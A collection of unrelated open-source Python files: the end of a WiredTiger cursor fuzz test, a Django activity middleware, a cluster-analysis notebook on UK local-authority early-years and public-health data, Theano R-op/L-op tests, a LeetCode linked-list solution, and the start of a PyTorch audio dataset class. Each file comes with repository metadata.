if (self.transactions_enabled):
self.session.begin_transaction('read_timestamp=' + self.timestamp_str(self.current_ts))
self.run_bound_scenarios(bound_set, read_cursor)
if (self.transactions_enabled):
self.session.rollback_transaction()
if (prepare):
write_session.commit_transaction(
'commit_timestamp=' + self.timestamp_str(self.current_ts) +
',durable_timestamp='+ self.timestamp_str(self.current_ts))
self.clear_prepare_key_ranges()
self.current_ts += 1
if (i % 10 == 0):
# Technically this is a write but easier to do it with this session.
self.session.checkpoint()
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_cursor_bound_fuzz.py | test_cursor_bound_fuzz.py | py | 27,014 | python | en | code | 24,670 | github-code | 36 |
6789488341 | from django.contrib import auth
from django.core.exceptions import ObjectDoesNotExist
from .models import Member
class EcosystemActivityMiddleware:
EXTENSIONS_EXCLUDED = ['js', 'map', 'css']
PATHS_EXCLUDED = ['/api/graphql-jwt']
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
user = self._get_user(request)
if user.is_authenticated and \
request.method in ['POST', 'PUT', 'DELETE']:
try:
member = Member.objects.get(user=user)
member.update_activity()
except ObjectDoesNotExist:
pass
return self.get_response(request)
def _get_user(self, request):
if not hasattr(request, '_cached_user'):
request._cached_user = auth.get_user(request)
return request._cached_user
| tomasgarzon/exo-services | service-exo-core/ecosystem/middleware.py | middleware.py | py | 888 | python | en | code | 0 | github-code | 36 |
72743077225 | # ---
# jupyter:
# jupytext:
# cell_metadata_filter: -all
# comment_magics: true
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown]
# # Exploratory cluster analysis
# %%
# Exploratory cluster analysis
# %load_ext autoreload
# %autoreload 2
# %% [markdown]
# ## Preamble
# %%
import altair as alt
import numpy as np
from scipy.stats import ttest_ind
import pandas as pd
import requests
from toolz import pipe
from afs_neighbourhood_analysis.getters.clustering import clustering_diagnostics
from afs_neighbourhood_analysis.pipeline.lad_clustering.cluster_utils import (
extract_clusters,
clustering_params,
)
from afs_neighbourhood_analysis.getters.clustering import (
early_years_for_clustering,
public_health_for_clustering,
)
# %%
phf_long
# %%
def fetch_geojson(url):
return pipe(
requests.get(url),
lambda req: [e["properties"] for e in req.json()["features"]],
pd.DataFrame,
)
def make_code_name_lookup():
county_json = pipe(
fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/CTY_APR_2019_EN_NC/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
),
lambda df: df.set_index("CTY19CD")["CTY19NM"].to_dict(),
)
lad_json = (
pd.read_excel(
"https://www.arcgis.com/sharing/rest/content/items/c4f647d8a4a648d7b4a1ebf057f8aaa3/data"
)
.set_index(["LAD21CD"])["LAD21NM"]
.to_dict()
)
return {**county_json, **lad_json}
def get_code_nuts_lookup():
lad_nuts = (
pd.read_excel(
"https://www.arcgis.com/sharing/rest/content/items/c110087ae04a4cacb4ab0aef960936ce/data"
)
.set_index("LAD20CD")["ITL121NM"]
.to_dict()
)
lad_county = pipe(
fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/LAD21_CTY21_EN_LU/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
),
lambda df: df.set_index("LAD21CD")["CTY21CD"],
)
return {
**{code: name for code, name in lad_nuts.items()},
**{lad_county[lad]: lad_nuts[lad] for lad in set(lad_county.keys())},
}
def plot_ey_perf(ey, year, gender):
"""LALALA"""
return (
alt.Chart(ey.query(f"year=={year}").query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
y="cluster:O",
color="cluster:N",
x="zscore",
tooltip=["la_name"],
column="indicator",
)
).properties(width=200)
def plot_ey_trend(ey, gender="Total"):
""" """
return (
alt.Chart(ey_bench.query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
x="year:O",
y="zscore",
column="cluster",
color="cluster:N",
row="indicator",
tooltip=["la_name", "cluster"],
)
).properties(width=100, height=100)
def plot_ey_year_comp(ey, gender="Total"):
""" """
return (
alt.Chart(ey_bench.query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
column="year:O",
y="zscore",
x="cluster:N",
color="cluster:N",
row="indicator",
tooltip=["la_name", "cluster"],
)
).properties(width=100, height=100)
def plot_ey_evol(ey_table, gender):
""" """
# return (alt.Chart(ey_table.query(f"gender=='{gender}'"))
# .mark_line(point=True)
# .encode(x="year",y="zscore",color="cluster:N",
# row="indicator",column="cluster",
# detail="la_name",tooltip=["la_name","year","zscore"])
# .properties(width=100,height=100))
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("zscore", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="la_name",
tooltip=["la_name", "zscore"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(zscore)", scale=alt.Scale(zero=False), title="Score"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=ey_table.query(f"gender=='{gender}'"))
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
def phf_for_analysis(ph_table, cluster_lookup, code_name_lookup):
return (
phf.stack()
.reset_index(name="score")
.assign(cluster=lambda df: df["area_code"].map(cluster_lookup))
.assign(area_name=lambda df: df["area_code"].map(code_name_lookup))
)
def calc_mean_ph(ph_long):
ph_agg = pd.concat(
[
ph_long.rename(columns={"score": name})
.groupby(["cluster", "indicator_name_expanded"])[name]
.apply(lambda x: function(x))
for function, name in zip([np.mean, np.std], ["mean", "std"])
],
axis=1,
).reset_index()
return ph_agg.assign(
rank=lambda df: df["indicator_name_expanded"].map(
ph_agg.groupby("indicator_name_expanded")["mean"].std().rank(ascending=True)
)
)
# return (pd.concat([ph_long
# .rename(columns={"score":name})
# .groupby(["cluster","indicator_name_expanded"])[name].apply(lambda x: function(x)) for
# function,name in zip([np.mean, np.std],["mean","std"])],axis=1)
# .reset_index()
# .assign(rank = lambda df: df["indicator_name_expanded"]
# .map(ph_mean
# .groupby("indicator_name_expanded")["mean"]
# .std().rank(ascending=True))))
def phf_ttest(phf_long, sig_level=0.05, equal_var=True):
""" """
test_results = []
for ind in phf_long["indicator_name_expanded"].unique():
ind_df = phf_long.query(f"indicator_name_expanded == '{ind}'").reset_index(
drop=True
)
for cl in ind_df["cluster"].unique():
ttest = ttest_ind(
ind_df.query(f"cluster=={cl}")["score"],
ind_df.query(f"cluster!={cl}")["score"],
equal_var=equal_var,
)
test_results.append([ind, cl, ttest.pvalue])
return pd.DataFrame(
test_results, columns=["indicator", "cluster", "ttest_sign"]
).assign(is_sig=lambda df: df["ttest_sign"] < sig_level)
def plot_phf_differences(phf_long, sig_level=0.05, equal_var=True):
return (
alt.Chart(
pipe(phf_long, calc_mean_ph)
.merge(
phf_ttest(phf_long, sig_level, equal_var),
left_on=["indicator_name_expanded", "cluster"],
right_on=["indicator", "cluster"],
)
.query("is_sig == True")
)
.mark_rect(filled=True)
.encode(
x=alt.X(
"indicator_name_expanded",
sort=alt.EncodingSortField("rank", order="descending"),
axis=alt.Axis(labels=False, ticks=False),
),
y="cluster:N",
color=alt.Color("mean", scale=alt.Scale(scheme="Redblue", reverse=True)),
tooltip=["cluster", "indicator_name_expanded", "mean"],
)
.properties(width=800, height=300)
)
def plot_gender_gap_trend(gender_gap):
""" """
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("ratio", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="new_la_code",
tooltip=["la_name", "ratio"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(ratio)", scale=alt.Scale(zero=False), title="Gender ratio"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=gender_gap)
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
def get_gender_gap(ey):
"""Calculates gender gap between boys and girls"""
return (
ey.groupby(["year", "indicator"])
.apply(
lambda df: df.pivot_table(
index="new_la_code", columns="gender", values="score"
).assign(ratio=lambda df_2: (df_2["Girls"] / df_2["Boys"]))["ratio"]
)
.reset_index(drop=False)
.assign(cluster=lambda df: df["new_la_code"].map(clust_lu))
# .assign(la_name = lambda df: df["new_la_code"].map(names_codes_lookup_2))
.assign(la_name=lambda df: df["new_la_code"].map(code_name_lookup))
# .dropna(axis=0,subset=["cluster"])
)
def plot_gender_gap_comp(gender_gap, year=2019):
"""Boxplot comparing gender gap across clusters"""
return (
alt.Chart(gender_gap.query(f"year=={year}"))
.mark_boxplot()
.encode(
y="cluster:N",
x=alt.X("ratio", scale=alt.Scale(zero=False)),
column="indicator",
tooltip=["la_name", "ratio"],
color="cluster:N",
)
.resolve_axis(x="independent")
.properties(width=200)
)
def plot_gender_gap_trend(gender_gap):
"""Visualise trends in gender gap"""
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("ratio", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="new_la_code",
tooltip=["la_name", "ratio"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(ratio)", scale=alt.Scale(zero=False), title="Gender ratio"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=gender_gap)
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
# %% [markdown]
# ## Clustering diagnostics
# %%
diag = clustering_diagnostics()
# %%
alt.Chart(diag).mark_point(filled=True).encode(
x="pca", y="value", row="diagnostic_var", color="comm_resolution:O"
).resolve_scale(y="independent")
# %%
pca_mean = (
diag.groupby(["pca", "diagnostic_var"])["value"].median().reset_index(drop=False)
)
alt.Chart(pca_mean).mark_line(point=True).encode(
x="pca", y="value", color="diagnostic_var"
)
# %%
com_res_mean = (
diag.groupby(["comm_resolution", "diagnostic_var"])["value"]
.median()
.reset_index(drop=False)
)
alt.Chart(com_res_mean).mark_line(point=True).encode(
x="comm_resolution", y="value", color="diagnostic_var"
)
# %% [markdown]
# ## Extract clusters
# %%
ey = early_years_for_clustering()
phf = public_health_for_clustering()
# %%
clust = extract_clusters(phf, 5, 0.9, clustering_params)
# %%
code_name_lookup = make_code_name_lookup()
code_nut_lookup = get_code_nuts_lookup()
# %%
cluster_df = (
pd.Series(clust[1])
.reset_index(name="cluster")
.assign(geo_name=lambda df: df["index"].map(code_name_lookup))
.assign(nuts_name=lambda df: df["index"].map(code_nut_lookup))
.rename(columns={"index": "geo_code"})
)
# %% [markdown]
# ## Explore cluster results
# %% [markdown]
# ### Regional differences
# %%
clust_region_shares = (
cluster_df.groupby("cluster")["nuts_name"]
.apply(lambda x: x.value_counts(normalize=True))
.unstack()
.fillna(0)
.stack()
.reset_index(name="share")
.rename(columns={"level_1": "region"})
)
reg_bar = (
alt.Chart(clust_region_shares)
.mark_bar()
.encode(y="cluster:O", x="share", color="region")
)
reg_bar
# %% [markdown]
# ### EFSYP performance differences
# %%
clust_lu = cluster_df.set_index("geo_code")["cluster"].to_dict()
# %%
ey_bench = ey.assign(cluster=lambda df: df["new_la_code"].map(clust_lu)).dropna(
axis=0, subset=["cluster"]
)
# %%
ey_comp = (
ey.query("year==2019")
.query("gender=='Total'")
.assign(cluster=lambda df: df["new_la_code"].map(clust_lu))
.dropna(axis=0, subset=["cluster"])
)
# %%
plot_ey_perf(ey_bench, 2019, "Total")
# %%
plot_ey_perf(ey_bench, 2019, "Boys")
# %% [markdown]
# ### Evolution of differences
# %%
plot_ey_trend(ey_bench)
# %% [markdown]
# ### Year on year comparisons
# %%
plot_ey_year_comp(ey_bench)
# %%
(
ey_bench.query("gender=='Total'")
.groupby("indicator")
.apply(
lambda x: x.pivot_table(
index="new_la_code", columns="year", values="zscore"
).corr()
)[2019]
.unstack()
)
# %% [markdown]
# ### Differences between clusters
# %%
phf_long = phf_for_analysis(phf, clust_lu, code_name_lookup)
# %%
plot_phf_differences(phf_long, sig_level=0.01)
# %% [markdown]
# ### Improvements in performance inside clusters
# %%
# Where have we seen the greatest improvements inside clusters?
# %%
plot_ey_evol(ey_bench, "Girls")
# %%
# Other things to do:
# 1. Calculate SHAPLEY values for variables
# 2. measure gender gap in performance inside clusters
# 3. Create choropleth
# %%
# Gender gap
# %%
# %%
gender_gap = get_gender_gap(ey)
# %%
gender_gap.columns
# %%
gender_gap.loc[gender_gap["la_name"].isna()]
# %%
plot_gender_gap_comp(gender_gap, year=2019)
# %%
plot_gender_gap_trend(gender_gap)
# %%
la = fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/Counties_and_Unitary_Authorities_December_2021_UK_BGC/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
)
# %%
names_codes_lookup_2 = la.set_index("CTYUA21CD")["CTYUA21NM"].to_dict()
# %%
names_codes_lookup_2
# %%
| nestauk/afs_neighbourhood_analysis | afs_neighbourhood_analysis/analysis/cluster_eda.py | cluster_eda.py | py | 14,185 | python | en | code | 0 | github-code | 36 |
42494180975 | """
WRITE ME
Tests for the R operator / L operator
For the list of op with r op defined, with or without missing test
see this file: doc/library/tensor/basic.txt
For function to automatically test your Rop implementation, look at
the docstring of the functions: check_mat_rop_lop, check_rop_lop,
check_nondiff_rop,
"""
from __future__ import absolute_import, print_function, division
import unittest
from theano.tests import unittest_tools as utt
from theano import function
import theano
from theano import tensor
import itertools
import numpy as np
from theano.gof import Op, Apply
from theano.gradient import grad_undefined
from theano.tests.unittest_tools import SkipTest
from theano.tensor.signal.pool import Pool
from theano.tensor.nnet import conv, conv2d
'''
Special Op created to test what happens when you have one op that is not
differentiable in the computational graph
'''
class BreakRop(Op):
"""
@note: Non-differentiable.
"""
__props__ = ()
def make_node(self, x):
return Apply(self, [x], [x.type()])
def perform(self, node, inp, out_):
x, = inp
out, = out_
out[0] = x
def grad(self, inp, grads):
return [grad_undefined(self, 0, inp[0])]
def R_op(self, inputs, eval_points):
return [None]
break_op = BreakRop()
class RopLop_checker(unittest.TestCase):
"""
Don't peform any test, but provide the function to test the
Rop to class that inherit from it.
"""
def setUp(self):
utt.seed_rng()
# Using vectors make things a lot simpler for generating the same
# computations using scan
self.x = tensor.vector('x')
self.v = tensor.vector('v')
self.rng = np.random.RandomState(utt.fetch_seed())
self.in_shape = (5 + self.rng.randint(3),)
self.mx = tensor.matrix('mx')
self.mv = tensor.matrix('mv')
self.mat_in_shape = (5 + self.rng.randint(3),
5 + self.rng.randint(3))
def check_nondiff_rop(self, y):
"""
If your op is not differentiable(so you can't define Rop)
test that an error is raised.
"""
raised = False
try:
tensor.Rop(y, self.x, self.v)
except ValueError:
raised = True
if not raised:
self.fail((
'Op did not raise an error even though the function'
' is not differentiable'))
def check_mat_rop_lop(self, y, out_shape):
"""
Test the Rop/Lop when input is a matrix and the output is a vector
:param y: the output variable of the op applied to self.mx
:param out_shape: Used to generate a random tensor
corresponding to the evaluation point of the Rop
(i.e. the tensor with which you multiply the
Jacobian). It should be a tuple of ints.
If the Op has more than 1 input, one of them must be mx, while
others must be shared variables / constants. We will test only
against the input self.mx, so you must call
check_mat_rop_lop/check_rop_lop for the other inputs.
We expect all inputs/outputs have dtype floatX.
If you want to test an Op with an output matrix, add a sum
after the Op you want to test.
"""
vx = np.asarray(self.rng.uniform(size=self.mat_in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=self.mat_in_shape),
theano.config.floatX)
yv = tensor.Rop(y, self.mx, self.mv)
rop_f = function([self.mx, self.mv], yv, on_unused_input='ignore')
sy, _ = theano.scan(lambda i, y, x, v:
(tensor.grad(y[i], x) * v).sum(),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.mx, self.mv])
scan_f = function([self.mx, self.mv], sy, on_unused_input='ignore')
v1 = rop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('ROP mismatch: %s %s' % (v1, v2))
self.check_nondiff_rop(theano.clone(y, replace={self.mx: break_op(self.mx)}))
vv = np.asarray(self.rng.uniform(size=out_shape), theano.config.floatX)
yv = tensor.Lop(y, self.mx, self.v)
lop_f = function([self.mx, self.v], yv)
sy = tensor.grad((self.v * y).sum(), self.mx)
scan_f = function([self.mx, self.v], sy)
v1 = lop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('LOP mismatch: %s %s' % (v1, v2))
def check_rop_lop(self, y, out_shape):
"""
As check_mat_rop_lop, except the input is self.x which is a
vector. The output is still a vector.
"""
# TEST ROP
vx = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
yv = tensor.Rop(y, self.x, self.v)
rop_f = function([self.x, self.v], yv, on_unused_input='ignore')
J, _ = theano.scan(lambda i, y, x: tensor.grad(y[i], x),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.x])
sy = tensor.dot(J, self.v)
scan_f = function([self.x, self.v], sy, on_unused_input='ignore')
v1 = rop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('ROP mismatch: %s %s' % (v1, v2))
known_fail = False
try:
self.check_nondiff_rop(theano.clone(y, replace={self.x: break_op(self.x)}))
except AssertionError:
known_fail = True
# TEST LOP
vx = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=out_shape),
theano.config.floatX)
yv = tensor.Lop(y, self.x, self.v)
lop_f = function([self.x, self.v], yv, on_unused_input='ignore')
J, _ = theano.scan(lambda i, y, x: tensor.grad(y[i], x),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.x])
sy = tensor.dot(self.v, J)
scan_f = function([self.x, self.v], sy)
v1 = lop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('LOP mismatch: %s %s' % (v1, v2))
if known_fail:
raise SkipTest('Rop does not handle non-differentiable inputs '
'correctly. Bug exposed by fixing Add.grad method.')
class test_RopLop(RopLop_checker):
def test_shape(self):
self.check_nondiff_rop(self.x.shape[0])
def test_specifyshape(self):
self.check_rop_lop(tensor.specify_shape(self.x, self.in_shape),
self.in_shape)
def test_max(self):
# If we call max directly, we will return an CAReduce object
# which doesn't have R_op implemented!
# self.check_mat_rop_lop(tensor.max(self.mx, axis=[0,1])[0], ())
self.check_mat_rop_lop(tensor.max(self.mx, axis=0),
(self.mat_in_shape[1],))
self.check_mat_rop_lop(tensor.max(self.mx, axis=1),
(self.mat_in_shape[0],))
def test_argmax(self):
self.check_nondiff_rop(tensor.argmax(self.mx, axis=1))
def test_subtensor(self):
self.check_rop_lop(self.x[:4], (4,))
def test_incsubtensor1(self):
tv = np.asarray(self.rng.uniform(size=(3,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.inc_subtensor(self.x[:3], t)
self.check_rop_lop(out, self.in_shape)
def test_incsubtensor2(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.inc_subtensor(t[:4], self.x[:4])
self.check_rop_lop(out, (10,))
def test_setsubtensor1(self):
tv = np.asarray(self.rng.uniform(size=(3,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.set_subtensor(self.x[:3], t)
self.check_rop_lop(out, self.in_shape)
def test_print(self):
out = theano.printing.Print('x', attrs=('shape',))(self.x)
self.check_rop_lop(out, self.in_shape)
def test_setsubtensor2(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.set_subtensor(t[:4], self.x[:4])
self.check_rop_lop(out, (10,))
def test_dimshuffle(self):
# I need the sum, because the setup expects the output to be a
# vector
self.check_rop_lop(self.x[:4].dimshuffle('x', 0).sum(axis=0),
(4,))
def test_rebroadcast(self):
# I need the sum, because the setup expects the output to be a
# vector
self.check_rop_lop(tensor.unbroadcast(
self.x[:4].dimshuffle('x', 0), 0).sum(axis=1),
(1,))
def test_downsample(self):
rng = np.random.RandomState(utt.fetch_seed())
# ws, shp
examples = (
((2,), (16,)),
((2,), (4, 16,)),
((2,), (4, 2, 16,)),
((1, 1), (4, 2, 16, 16)),
((2, 2), (4, 2, 16, 16)),
((3, 3), (4, 2, 16, 16)),
((3, 2), (4, 2, 16, 16)),
((3, 2, 2), (3, 2, 16, 16, 16)),
((2, 3, 2), (3, 2, 16, 16, 16)),
((2, 2, 3), (3, 2, 16, 16, 16)),
((2, 2, 3, 2), (3, 2, 6, 6, 6, 5)),
)
for example, ignore_border in itertools.product(examples, [True, False]):
(ws, shp) = example
vx = rng.rand(*shp)
vex = rng.rand(*shp)
x = theano.shared(vx)
ex = theano.shared(vex)
maxpool_op = Pool(ignore_border, ndim=len(ws))
a_pooled = maxpool_op(x, ws).flatten()
yv = tensor.Rop(a_pooled, x, ex)
mode = None
if theano.config.mode == "FAST_COMPILE":
mode = "FAST_RUN"
rop_f = function([], yv, on_unused_input='ignore', mode=mode)
sy, _ = theano.scan(lambda i, y, x, v:
(tensor.grad(y[i], x) * v).sum(),
sequences=tensor.arange(a_pooled.shape[0]),
non_sequences=[a_pooled, x, ex],
mode=mode)
scan_f = function([], sy, on_unused_input='ignore', mode=mode)
v1 = rop_f()
v2 = scan_f()
assert np.allclose(v1, v2), ("Rop mismatch: %s %s" % (v1, v2))
def test_conv(self):
for conv_op in [conv.conv2d, conv2d]:
for border_mode in ['valid', 'full']:
image_shape = (2, 2, 4, 5)
filter_shape = (2, 2, 2, 3)
image_dim = len(image_shape)
filter_dim = len(filter_shape)
input = tensor.TensorType(
theano.config.floatX,
[False] * image_dim)(name='input')
filters = tensor.TensorType(
theano.config.floatX,
[False] * filter_dim)(name='filter')
ev_input = tensor.TensorType(
theano.config.floatX,
[False] * image_dim)(name='ev_input')
ev_filters = tensor.TensorType(
theano.config.floatX,
[False] * filter_dim)(name='ev_filters')
def sym_conv2d(input, filters):
return conv_op(input, filters, border_mode=border_mode)
output = sym_conv2d(input, filters).flatten()
yv = tensor.Rop(output, [input, filters], [ev_input, ev_filters])
mode = None
if theano.config.mode == "FAST_COMPILE":
mode = "FAST_RUN"
rop_f = function([input, filters, ev_input, ev_filters],
yv, on_unused_input='ignore', mode=mode)
sy, _ = theano.scan(lambda i, y, x1, x2, v1, v2:
(tensor.grad(y[i], x1) * v1).sum() +
(tensor.grad(y[i], x2) * v2).sum(),
sequences=tensor.arange(output.shape[0]),
non_sequences=[output, input, filters,
ev_input, ev_filters],
mode=mode)
scan_f = function([input, filters, ev_input, ev_filters], sy,
on_unused_input='ignore', mode=mode)
dtype = theano.config.floatX
image_data = np.random.random(image_shape).astype(dtype)
filter_data = np.random.random(filter_shape).astype(dtype)
ev_image_data = np.random.random(image_shape).astype(dtype)
ev_filter_data = np.random.random(filter_shape).astype(dtype)
v1 = rop_f(image_data, filter_data, ev_image_data, ev_filter_data)
v2 = scan_f(image_data, filter_data, ev_image_data, ev_filter_data)
assert np.allclose(v1, v2), ("Rop mismatch: %s %s" % (v1, v2))
def test_join(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.join(0, self.x, t)
self.check_rop_lop(out, (self.in_shape[0] + 10,))
def test_dot(self):
insh = self.in_shape[0]
vW = np.asarray(self.rng.uniform(size=(insh, insh)),
theano.config.floatX)
W = theano.shared(vW)
self.check_rop_lop(tensor.dot(self.x, W), self.in_shape)
def test_elemwise0(self):
self.check_rop_lop((self.x + 1) ** 2, self.in_shape)
def test_elemwise1(self):
self.check_rop_lop(self.x + tensor.cast(self.x, 'int32'),
self.in_shape)
def test_reshape(self):
new_shape = tensor.constant(np.asarray([
self.mat_in_shape[0] * self.mat_in_shape[1]],
dtype='int64'))
self.check_mat_rop_lop(self.mx.reshape(new_shape),
(self.mat_in_shape[0] * self.mat_in_shape[1],))
def test_flatten(self):
self.check_mat_rop_lop(self.mx.flatten(),
(self.mat_in_shape[0] * self.mat_in_shape[1],))
def test_sum(self):
self.check_mat_rop_lop(self.mx.sum(axis=1), (self.mat_in_shape[0],))
def test_softmax(self):
# Softmax adds an extra dimnesion !
self.check_rop_lop(tensor.nnet.softmax(self.x)[0], self.in_shape[0])
def test_alloc(self):
# Alloc of the sum of x into a vector
out1d = tensor.alloc(self.x.sum(), self.in_shape[0])
self.check_rop_lop(out1d, self.in_shape[0])
# Alloc of x into a 3-D tensor, flattened
out3d = tensor.alloc(self.x, self.mat_in_shape[0], self.mat_in_shape[1], self.in_shape[0])
self.check_rop_lop(out3d.flatten(), self.mat_in_shape[0] * self.mat_in_shape[1] * self.in_shape[0])
def test_invalid_input(self):
success = False
try:
tensor.Rop(0., [tensor.matrix()], [tensor.vector()])
success = True
except ValueError:
pass
assert not success
def test_multiple_outputs(self):
m = tensor.matrix('m')
v = tensor.vector('v')
m_ = tensor.matrix('m_')
v_ = tensor.vector('v_')
mval = self.rng.uniform(size=(3, 7)).astype(theano.config.floatX)
vval = self.rng.uniform(size=(7,)).astype(theano.config.floatX)
m_val = self.rng.uniform(size=(3, 7)).astype(theano.config.floatX)
v_val = self.rng.uniform(size=(7,)).astype(theano.config.floatX)
rop_out1 = tensor.Rop([m, v, m + v], [m, v], [m_, v_])
assert isinstance(rop_out1, list)
assert len(rop_out1) == 3
rop_out2 = tensor.Rop((m, v, m + v), [m, v], [m_, v_])
assert isinstance(rop_out2, tuple)
assert len(rop_out2) == 3
all_outs = []
for o in rop_out1, rop_out2:
all_outs.extend(o)
f = theano.function([m, v, m_, v_], all_outs)
f(mval, vval, m_val, v_val)
def test_Rop_dot_bug_18Oct2013_Jeremiah(self):
# This test refers to a bug reported by Jeremiah Lowin on 18th Oct
# 2013. The bug consists when through a dot operation there is only
# one differentiable path (i.e. there is no gradient wrt to one of
# the inputs).
x = tensor.arange(20.0).reshape([1, 20])
v = theano.shared(np.ones([20]))
d = tensor.dot(x, v).sum()
tensor.Rop(tensor.grad(d, v), v, v)
| Theano/Theano | theano/tests/test_rop.py | test_rop.py | py | 17,055 | python | en | code | 9,807 | github-code | 36 |
19406242010 | #
# @lc app=leetcode id=24 lang=python3
#
# [24] Swap Nodes in Pairs
#
# @lc code=start
# Definition for singly-linked list.
from typing import Optional
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:
dummy = ListNode(0)
dummy.next = head
pre = dummy
while head and head.next:
left = head
right = head.next
pre.next = right
left.next = right.next
right.next = left
pre = left
head = pre.next
if head:
pre.next = head
return dummy.next
# @lc code=end
| Matthewow/Leetcode | vscode_extension/24.swap-nodes-in-pairs.py | 24.swap-nodes-in-pairs.py | py | 772 | python | en | code | 2 | github-code | 36 |
26884869558 | import torch
from torch.utils.data import Dataset
import torch.utils.data.dataloader as dataloader
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from numpy.matlib import repmat
import math
MAX_LEN = 300
AUDIO_TYPE_ID = {'vowel-u': 0,'vowel-i': 1,'vowel-a': 2,'alphabet-a-z': 3, 'cough': 4, 'count-1-20': 5,}
# IMP_OVEC_FEAT = [16, 100, 709 , 88, 612, 484, 1390, 591, 94, 716, 499, 463, 373, 95, 1407, 86 ]#, \
# 194, 401, 1389, 380, 381, 49, 495, 319, 1, 24, 685, 465, 711, 727, 1132, 695, \
# 356, 726, 352, 10, 815, 729, 1153, 421, 332, 1327, 395, 700, 1432, 583, 1202, 754, 1306, 291]
# IMP_OVEC_FEAT = np.arange(1409,1582)
# IMP_OVEC_FEAT = np.arange(1582)
IMP_OVEC_FEAT = np.arange(10)
def uttToSpkChile(fullname):
f = fullname.split('/')[-1]#[:-1]
spk_id = f.split('_')[1]
return spk_id
class Dataset(Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, X, Y,all_files_ovec, UTT_TO_SPK):
self.X = X
self.Y = Y
self.mfc_to_ovec = self.mfcToOvec(X, all_files_ovec)
self.UTT_TO_SPK = UTT_TO_SPK
def __len__(self):
'Denotes the total number of samples'
return len(self.X)
def mfcToOvec(self, all_files_mfc, all_files_ovec):
'''return {mfcfile: ovecfile, ... }'''
mfc_file_base = list(map(lambda x: x.split('/')[-1].split('.')[0], all_files_mfc ))
ovec_file_base = list(map(lambda x: ('_').join(x.split('/')[-1].split('.')[0].split('_')[:-1]), all_files_ovec ))
# print(mfc_file_base)
# print(ovec_file_base)
res = {}
i = 0
for mfc_file in mfc_file_base:
j = 0
for ovec_file in ovec_file_base:
if mfc_file != ovec_file:
j += 1
continue
res[all_files_mfc[i]] = all_files_ovec[j]
break
i += 1
return res
def __getitem__(self, index):
x = self.X[index] # filename
y = self.Y[index] # int (0,1)
ovec_file = self.mfc_to_ovec[x]
ovec_feat = np.load(ovec_file)[IMP_OVEC_FEAT]
# print(ovec_file)
# print(np.load(ovec_file).shape)
# print(ovec_feat)
# exit()
# print(x, ovec_file)
audio_type = x.split('/')[-1].split('_')[0]
spk = self.UTT_TO_SPK[uttToSpkChile(x)]
# print(x, spk)
feat = np.load(x)
# print("FEAT: ", feat.shape)
### FOR SPEC ###
# need to do the transpose for spectrograms but not for mfccs
# feat = feat.transpose()
################
orig_len = feat.shape[0]
feat = repmat(feat, int(math.ceil(MAX_LEN/(feat.shape[0]))),1)
feat = feat[:MAX_LEN,:]
#### shuffling the cylinder ##
# pivot = np.random.randint(MAX_LEN)
# idx1 = np.arange(pivot, MAX_LEN)
# idx2 = np.arange(0, pivot)
# idx = np.concatenate((idx1, idx2))
# feat = feat[idx]
###############################
feat = feat.transpose()
